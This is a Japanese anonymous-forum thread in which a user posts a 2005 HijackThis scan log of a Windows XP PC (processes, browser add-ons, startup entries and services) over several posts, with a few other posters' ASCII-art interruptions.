Logfile of HijackThis v1.99.1
Scan saved at 22:37:41, on 2005/07/30
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\acs.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe
C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nmftskss.exe
C:\WINDOWS\system32\NTMETER.EXE
C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe

73 :66:2005/07/30(土) 22:41:18 ID:vQUTlBEV
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\Windows\System32\asrv.exe
C:\WINDOWS\system32\FUSCli.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\NEC\SmartVision\SVUPnPMn.exe
C:\Program Files\NEC\SmartVision\SvSche.exe
C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe
C:\Program Files\MediaGarage\MGSplash.exe
C:\Program Files\MediaGarage\MGAutoPlay.exe
C:\Program Files\Java\jre1.5.0\bin\jusched.exe
C:\Program Files\FaUserSW\NMUWATCH.EXE
C:\Program Files\Java\jre1.5.0\bin\jucheck.exe
C:\Program Files\SmartHobby\AutoDnP.exe
C:\Program Files\nectvrc\tvrc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\NECMFK\necmfk.exe
C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe
C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Softnavi\SNaviBTN.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\tora3\2chtubo\tubo\_2chtubo.exe
C:\Program Files\unDonut\unDonut.exe

74 :66:2005/07/30(土) 22:42:09 ID:vQUTlBEV
C:\PROGRA~1\TRENDM~1\VIRUSB~1\PCCMAIN.EXE
C:\PROGRA~1\TRENDM~1\VIRUSB~1\PccVScan.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\TSC.EXE
C:\Documents and Settings\YUKI-1\デスクトップ\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O3 - Toolbar: BIGLOBEツールバー - {DD7EDCBC-F49A-4008-AA47-74D852489985} - C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL
O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe
O4 - HKLM\..\Run: [SVUPnPManager] C:\Program Files\NEC\SmartVision\SVUPnPMn.exe
O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe
O4 - HKLM\..\Run: [dms_helper] "C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe"

75 :66:2005/07/30(土) 22:43:21 ID:vQUTlBEV
O4 - HKLM\..\Run: [MGSplash] C:\Program Files\MediaGarage\MGSplash.exe
O4 - HKLM\..\Run: [MGAutoPlay] C:\Program Files\MediaGarage\MGAutoPlay.exe
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0\bin\jusched.exe
O4 - HKLM\..\Run: [FaUserSW] C:\Program Files\FaUserSW\NMUWATCH.EXE
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe
O4 - HKLM\..\Run: [NECMFK] C:\Program Files\NECMFK\necmfk.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe"
O4 - HKLM\..\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE
O4 - HKLM\..\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe
O4 - HKLM\..\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [121ポップリンク] "C:\Program Files\GTAgent\AUAgent.exe" /startup
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000

76 :66:2005/07/30(土) 22:43:57 ID:vQUTlBEV
O8 - Extra context menu item: ニュース検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_news.htm
O8 - Extra context menu item: ページ検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_web.htm
O8 - Extra context menu item: 画像をマイ ピクチャへ上書き保存 - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/SCRIPT_URL.htm
O8 - Extra context menu item: 画像検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_pict.htm
O8 - Extra context menu item: 辞書検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_dic.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [!CNS] JWord (日本語キーワード)

77 :66:2005/07/30(土) 22:44:40 ID:vQUTlBEV
O14 - IERESET.INF: START_PAGE_URL=http://www.biglobe.ne.jp/index-pc.html
O16 - DPF: {1D7EBFD0-78EF-4A9F-BB1C-AF4762E95E8E} (VGGLoadSi Control) - http://www.gogosi.jp/VGGLoadSi.cab
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {2A7EFEAA-8059-4C69-8FE2-4BA999C3B102} (TrickCtrl Class) - https://ssl2.gcrest.com/trickster/cabs/TrickLauncher.cab
O16 - DPF: {7623BE59-D4CF-4379-ABC4-B39E11854D66} (MabinogiWebAvatarRenderer Class) - http://avatar.mabinogi.jp/3drender/renderer/mabiweb_JP.2005.2.2.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O18 - Protocol: bw+0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw+0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw10 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw10s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

78 :66:2005/07/30(土) 22:45:36 ID:vQUTlBEV
O18 - Protocol: bw20 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw20s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw50 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw50s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw60 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw60s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw70 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw70s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

79 :66:2005/07/30(土) 22:46:14 ID:vQUTlBEV
O18 - Protocol: bw80 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw80s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwb0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwb0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwe0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

80 :66:2005/07/30(土) 22:47:07 ID:vQUTlBEV
O18 - Protocol: bwe0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O18 - Protocol: bwg0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwg0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

81 :66:2005/07/30(土) 22:48:40 ID:vQUTlBEV
O18 - Protocol: bwk0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwk0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwp0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwp0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwq0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

82 :66:2005/07/30(土) 22:49:27 ID:vQUTlBEV
O18 - Protocol: bwq0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwu0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwu0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

83 :ひよこ名無しさん:2005/07/30(土) 22:50:09 ID:???
....       ,-――――――-、
..       /  __[|__  ヽ
   ,-´ ̄ ̄ ̄ ̄____ ̄ ̄ ̄ ̄`―、
.   /,-――――i_|..[□ □]...|.i――――-、ヽ
  |_|.[リュンリュン ]|..|i-------i|.|[ 特.......急 ]|_|
  | |――――-|.||i―――i||.|.-────| |
  | |      /| |||    .|||.|         | |    ___________
  | |   /   | |||     |||.|   ∩∩  | |   /
  | | /    | |||     |||.|   | |_| |  | | <  リュンパッチ♪発進だよ!
  | |   /  | |||     |||.| ( ・∀・ ) | |   \___________
  | | /    .| |||     |||.|¶⊂¶⊂ ) .| |
  | `ー-.--、_|..|||_____|||.|_,----―'´...|
  |        ..||. ̄ ̄ ̄.||.        .|
  |   [二l二]  ||. リュン♪.||  [二l二]   |
 ..ヽ     _  ||____||   _   ../
  .ヽ_____|ニ二二ニ|_______/
   ..|| / ̄ ̄|.|!|_{|=゚ロ|}_|!|.| ̄ ̄ヽ. ||
 .. ヽ ̄   .|________|   ... ̄/
   ヽ___ヽ_______/____/

84 :66:2005/07/30(土) 22:50:15 ID:vQUTlBEV
O18 - Protocol: bwx0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwx0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwz0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwz0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll
O18 - Protocol: offline-8876480 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: Unimodem - C:\WINDOWS\system32\mwc42loc.dll
O23 - Service: Atheros Configuration Service (ACS) - Unknown owner - C:\WINDOWS\system32\acs.exe
O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)
O23 - Service: Family Channel Switch (Asrv) - Unknown owner - c:\Windows\System32\asrv.exe
O23 - Service: B's Recorder GOLD Library Service (bgsvclib) - B.H.A Corporation - C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe
O23 - Service: DiXiM Media Server - DigiOn - C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe

85 :ひよこ名無しさん:2005/07/30(土) 22:50:44 ID:???
                      、、, , , , , , ,
      / ̄ ̄ ̄ ̄\       、/; ̄', ̄', ̄',\,
   ./ /フ          ヽ       、/、` 、 ' '  , ' ", X
   / o~  _     ___  |     ソ、゙ `        ' "|
   |    / ゚ ヽ  / ゚ ヽ |     |゙ ゙   /⌒ヽ  /⌒l |
  ,--、  `ー〜'  `ー〜 /    ,--、     ・ `ー' ・   /
 ( 6   i―┬┬┬┬i 〈     ( 6  i‐―┬―┬‐; 〈
   ̄l   \_,二_二ノ ノ       ̄l、 \ ,二二、ノ ノ
    _\_  ̄ ̄ ̄_,/       _\_  ̄ ̄ ̄_,/
  ./  \ ̄7ヾ~~7 \     ./::::lll::/|~7ヾ~|ヽ::\
  |  /⌒ヽVl_lV  /⌒ヽ   |:::::::::lll::> Vl^lV<::|:::|
  |、 / ー'ー'  / |   | ー'ーf   |:::::::::|::::::\ヾV/./::|::::|
  ヾニニニソ  .| |   |ニニソ    |:::::::::|:::日:::\l/日:|::::|

86 :ひよこ名無しさん:2005/07/30(土) 22:51:34 ID:???
>>83>>85
かわいそうだからじゃまするのやめてやれ

87 :66:2005/07/30(土) 22:52:30 ID:vQUTlBEV
O23 - Service: MSCSPTISRV - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: Register Task Helper (Nmftskss) - NEC Corporation - C:\WINDOWS\system32\nmftskss.exe
O23 - Service: NT Meter - Unknown owner - C:\WINDOWS\system32\NTMETER.EXE
O23 - Service: PACSPTISVR - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe
O23 - Service: BroadPass Manager (Poling_Service) - 日本電気株式会社 - c:\Program Files\BIGLOBE\BroadPass\base\base.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
